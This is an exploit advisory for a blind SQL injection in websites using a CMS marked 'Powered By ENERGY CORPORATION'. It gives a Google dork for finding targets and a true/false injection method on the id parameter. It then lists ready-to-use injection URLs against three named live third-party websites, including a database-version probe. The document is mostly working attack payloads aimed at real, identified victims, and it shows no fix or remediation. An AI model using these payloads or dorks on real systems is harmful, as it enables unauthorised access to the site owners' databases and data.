*********************************************************
#Exploit Title: ENERGY CORPORATION - Blind Sql Injection
#Date: 2024-01-07
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered By ENERGY CORPORATION"
#Category:webapps
#Tested On: Mac, Firefox
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* http://www.petronovo.com/subService.php?id=26%20and%20true--
* http://www.petronovo.com/subService.php?id=26%20and%20false--
* http://www.petronovo.com/subService.php?id=26%20and%20substring(@@version,1,1)=1--
### Demo 2:
* http://eptspill.com/services.php?id=28%20and%20true--
* http://eptspill.com/services.php?id=28%20and%20false--
* http://eptspill.com/services.php?id=28%20and%20substring(@@version,1,1)=1--
### Demo 3:
* http://www.fairtranslogistics.com/newsDetails.php?id=7%20and%20true--
* http://www.fairtranslogistics.com/newsDetails.php?id=7%20and%20false--
* http://www.fairtranslogistics.com/newsDetails.php?id=7%20and%20substring(@@version,1,1)=1--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************